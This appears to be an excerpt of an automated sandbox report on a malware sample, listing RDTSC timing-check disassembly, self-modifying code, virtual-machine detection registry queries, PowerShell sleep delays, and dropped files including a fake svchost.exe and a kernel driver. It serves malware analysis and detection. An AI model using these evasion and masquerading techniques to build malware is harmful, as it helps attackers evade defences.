                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5ED0826 second address: 5ED082C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5ED082C second address: 5ED0830 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5ED0830 second address: 5ED0721 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 jmp 00007F87BC5165C7h 0x0000000e retn 0008h 0x00000011 mov dword ptr [004106C4h], eax 0x00000016 push 00403072h 0x0000001b push dword ptr [004106C0h] 0x00000021 call 00007F87BC516F12h 0x00000026 jmp 00007F87C1FE5156h 0x0000002b mov edi, edi 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F87BC5165C7h 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5ED05CC second address: 5ED05E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC98h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5ED05E8 second address: 5ED05FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F87BC5165BEh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5ED050F second address: 5ED0532 instructions: 0x00000000 rdtsc 0x00000002 mov edi, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov edx, eax 0x00000008 popad 0x00000009 push eax 0x0000000a jmp 00007F87BD02CC91h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 mov ebx, esi 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5ED0532 second address: 5ED0536 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5ED0536 second address: 5ED054E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F87BD02CC8Dh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5ED054E second address: 5ED055E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F87BC5165BCh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5F00BB9 second address: 5F00BD1 instructions: 0x00000000 rdtsc 0x00000002 mov di, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov ebx, eax 0x0000000d movzx esi, bx 0x00000010 popad 0x00000011 push ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5F00BD1 second address: 5F00BEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BC5165C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5F00BEE second address: 5F00BFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F87BD02CC8Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5F00BFE second address: 5F00C77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], edi 0x0000000b jmp 00007F87BC5165C7h 0x00000010 mov edi, dword ptr [ebp+0Ch] 0x00000013 jmp 00007F87BC5165C6h 0x00000018 test edi, FFFE0000h 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 mov esi, edi 0x00000023 pushfd 0x00000024 jmp 00007F87BC5165C9h 0x00000029 and eax, 3526E536h 0x0000002f jmp 00007F87BC5165C1h 0x00000034 popfd 0x00000035 popad 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5F00C77 second address: 5F00CFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F882CD47E39h 0x0000000f jmp 00007F87BD02CC8Eh 0x00000014 mov ecx, dword ptr [ebp+08h] 0x00000017 jmp 00007F87BD02CC90h 0x0000001c cmp ecx, FFFFFFFFh 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F87BD02CC8Eh 0x00000026 sbb eax, 4A193DE8h 0x0000002c jmp 00007F87BD02CC8Bh 0x00000031 popfd 0x00000032 jmp 00007F87BD02CC98h 0x00000037 popad 0x00000038 je 00007F882CD47DE1h 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 popad 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5F00CFD second address: 5F00D01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5F00D01 second address: 5F00D07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5F00D07 second address: 5F00D1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, ax 0x00000006 movzx ecx, bx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c cmp ecx, 0000FFFFh 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5F00D1F second address: 5F00D23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5F00D23 second address: 5F00D35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BC5165BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5F00D35 second address: 5F00D3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5F00D3B second address: 5F00DA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F882C2316BFh 0x0000000e jmp 00007F87BC5165C9h 0x00000013 call 00007F882C21DB7Eh 0x00000018 mov edi, edi 0x0000001a push ebp 0x0000001b mov ebp, esp 0x0000001d mov edx, dword ptr fs:[00000018h] 0x00000024 sub esp, 08h 0x00000027 mov eax, dword ptr [edx+00000FDCh] 0x0000002d test eax, eax 0x0000002f jns 00007F87BC5165B4h 0x00000031 add edx, eax 0x00000033 test ecx, ecx 0x00000035 je 00007F87BC5165BEh 0x00000037 cmp ecx, dword ptr [edx+00000840h] 0x0000003d je 00007F87BC51664Fh 0x00000043 mov eax, dword ptr [edx+00000848h] 0x00000049 mov edx, dword ptr [edx+0000084Ch] 0x0000004f mov esp, ebp 0x00000051 pop ebp 0x00000052 ret 0x00000053 pushad 0x00000054 pushfd 0x00000055 jmp 00007F87BC5165BCh 0x0000005a add ax, A768h 0x0000005f jmp 00007F87BC5165BBh 0x00000064 popfd 0x00000065 mov ecx, 2D08F95Fh 0x0000006a popad 0x0000006b mov ecx, eax 0x0000006d push eax 0x0000006e push edx 0x0000006f jmp 00007F87BC5165C1h 0x00000074 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5F00DA1 second address: 5F00E32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or ecx, edx 0x0000000b jmp 00007F87BD02CC8Eh 0x00000010 je 00007F882CD1FDB8h 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F87BD02CC8Eh 0x0000001d and eax, 156DBF58h 0x00000023 jmp 00007F87BD02CC8Bh 0x00000028 popfd 0x00000029 pushfd 0x0000002a jmp 00007F87BD02CC98h 0x0000002f adc cx, C9B8h 0x00000034 jmp 00007F87BD02CC8Bh 0x00000039 popfd 0x0000003a popad 0x0000003b push 00000001h 0x0000003d pushad 0x0000003e call 00007F87BD02CC94h 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5F00E32 second address: 5F00E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push dword ptr [ebp+14h] 0x00000009 jmp 00007F87BC5165BAh 0x0000000e mov ecx, edi 0x00000010 jmp 00007F87BC5165C0h 0x00000015 xchg eax, edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F87BC5165C7h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5F00E71 second address: 5F00E77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5F00E77 second address: 5F00E7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5F00E7B second address: 5F00F0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F87BD02CC99h 0x00000011 xchg eax, edx 0x00000012 jmp 00007F87BD02CC8Eh 0x00000017 mov edx, dword ptr [ebp+10h] 0x0000001a pushad 0x0000001b jmp 00007F87BD02CC8Eh 0x00000020 pushad 0x00000021 mov si, A457h 0x00000025 mov ebx, esi 0x00000027 popad 0x00000028 popad 0x00000029 nop 0x0000002a jmp 00007F87BD02CC96h 0x0000002f push eax 0x00000030 jmp 00007F87BD02CC8Bh 0x00000035 nop 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F87BD02CC95h 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5ED0871 second address: 5ED08B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F87BC5165C1h 0x0000000b popad 0x0000000c xchg eax, ebp 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F87BC5165BCh 0x00000014 adc cl, 00000018h 0x00000017 jmp 00007F87BC5165BBh 0x0000001c popfd 0x0000001d mov di, si 0x00000020 popad 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 mov ebx, eax 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5ED08B3 second address: 5ED08B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5ED08B8 second address: 5ED08D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F87BC5165C4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5ED08D0 second address: 5ED0937 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov dx, si 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F87BD02CC8Eh 0x00000017 sbb esi, 23236708h 0x0000001d jmp 00007F87BD02CC8Bh 0x00000022 popfd 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 popad 0x00000027 mov ebp, esp 0x00000029 pushad 0x0000002a mov dl, ch 0x0000002c jmp 00007F87BD02CC97h 0x00000031 popad 0x00000032 mov edx, dword ptr [ebp+0Ch] 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 mov di, C0D6h 0x0000003c movsx edx, si 0x0000003f popad 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5ED0937 second address: 5ED095F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BC5165C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ecx, edx 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5ED0980 second address: 5ED0984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5ED0984 second address: 5ED098A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5ED098A second address: 5ED0990 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5ED021E second address: 5ED0222 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5ED0222 second address: 5ED0276 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov edi, esi 0x00000008 popad 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F87BD02CC8Dh 0x00000013 add cl, FFFFFFE6h 0x00000016 jmp 00007F87BD02CC91h 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F87BD02CC90h 0x00000022 sbb esi, 3F6C1E88h 0x00000028 jmp 00007F87BD02CC8Bh 0x0000002d popfd 0x0000002e popad 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5ED0276 second address: 5ED028E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F87BC5165C4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5ED028E second address: 5ED032F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F87BD02CC94h 0x00000014 adc ax, 9348h 0x00000019 jmp 00007F87BD02CC8Bh 0x0000001e popfd 0x0000001f mov dh, ah 0x00000021 popad 0x00000022 push 00000000h 0x00000024 jmp 00007F87BD02CC8Bh 0x00000029 push dword ptr [ebp+0Ch] 0x0000002c jmp 00007F87BD02CC96h 0x00000031 push dword ptr [ebp+10h] 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 call 00007F87BD02CC8Dh 0x0000003c pop ecx 0x0000003d pushfd 0x0000003e jmp 00007F87BD02CC91h 0x00000043 adc ax, 5876h 0x00000048 jmp 00007F87BD02CC91h 0x0000004d popfd 0x0000004e popad 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5ED0366 second address: 5EE030E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F87BC5165C7h 0x00000009 and si, F3BEh 0x0000000e jmp 00007F87BC5165C9h 0x00000013 popfd 0x00000014 jmp 00007F87BC5165C0h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c pop ebp 0x0000001d pushad 0x0000001e pushad 0x0000001f call 00007F87BC5165BCh 0x00000024 pop ecx 0x00000025 popad 0x00000026 jmp 00007F87BC5165BEh 0x0000002b popad 0x0000002c retn 000Ch 0x0000002f or eax, eax 0x00000031 jne 00007F87BC5165B7h 0x00000033 mov dword ptr [00403C74h], eax 0x00000038 push eax 0x00000039 push 00000000h 0x0000003b call 00007F87BC516837h 0x00000040 jmp 00007F87C1FF4CBBh 0x00000045 mov edi, edi 0x00000047 jmp 00007F87BC5165C6h 0x0000004c xchg eax, ebp 0x0000004d jmp 00007F87BC5165C0h 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 pushfd 0x00000057 jmp 00007F87BC5165BCh 0x0000005c xor esi, 0E970CA8h 0x00000062 jmp 00007F87BC5165BBh 0x00000067 popfd 0x00000068 push ecx 0x00000069 pop edx 0x0000006a popad 0x0000006b rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5EE030E second address: 5EE0348 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC95h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushfd 0x0000000e jmp 00007F87BD02CC8Ah 0x00000013 or esi, 3F2B3A38h 0x00000019 jmp 00007F87BD02CC8Bh 0x0000001e popfd 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5EE0348 second address: 5EE0365 instructions: 0x00000000 rdtsc 0x00000002 mov dx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 call 00007F87BC5165C2h 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5ED0DE5 second address: 5ED0DEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5ED0DEA second address: 5ED0E1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx ecx, bx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b pushad 0x0000000c mov edx, ecx 0x0000000e call 00007F87BC5165BCh 0x00000013 pop ecx 0x00000014 popad 0x00000015 mov dword ptr [esp], ebp 0x00000018 jmp 00007F87BC5165BDh 0x0000001d mov ebp, esp 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5ED0E1E second address: 5ED0E22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5ED0E22 second address: 5ED0E26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5ED0E26 second address: 5ED0E2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5ED0E2C second address: 5ED0E49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BC5165C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeSpecial instruction interceptor: First address: EE677B instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\47SXvEQ.exeSpecial instruction interceptor: First address: 10938C0 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\47SXvEQ.exeSpecial instruction interceptor: First address: 111F964 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\47SXvEQ.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\47SXvEQ.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\47SXvEQ.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\47SXvEQ.exeCode function: 0_2_05EE0E98 rdtsc 0_2_05EE0E98
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6964Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2852Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5973
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 555
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4935
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 402
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1814
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8247
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1116
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4713
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1088
                Source: C:\Users\user\AppData\Local\Temp\Built.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54322\_ctypes.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Built.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54322\_bz2.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Built.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54322\select.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Built.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54322\_decimal.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Built.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54322\_hashlib.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Built.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54322\_ssl.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Built.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54322\_socket.pydJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sywb4geu\sywb4geu.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Built.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54322\_queue.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Built.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54322\rar.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Built.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54322\_sqlite3.pydJump to dropped file
                Source: C:\ProgramData\Microsoft\svchost.exeDropped PE file which has not been started: C:\Windows\Temp\qnibnfgnagzt.sysJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Built.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54322\python310.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Built.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54322\unicodedata.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Built.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54322\_lzma.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_4-17263
                Source: C:\Users\user\AppData\Local\Temp\Built.exeAPI coverage: 4.9 %
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6628Thread sleep count: 6964 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6568Thread sleep count: 2852 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6284Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7248Thread sleep count: 5973 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7244Thread sleep count: 555 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7380Thread sleep time: -2767011611056431s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7336Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7296Thread sleep count: 4935 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7296Thread sleep count: 402 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7396Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7348Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7796Thread sleep count: 1814 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8104Thread sleep time: -2767011611056431s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8120Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8124Thread sleep count: 8247 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8076Thread sleep time: -10145709240540247s >= -30000s
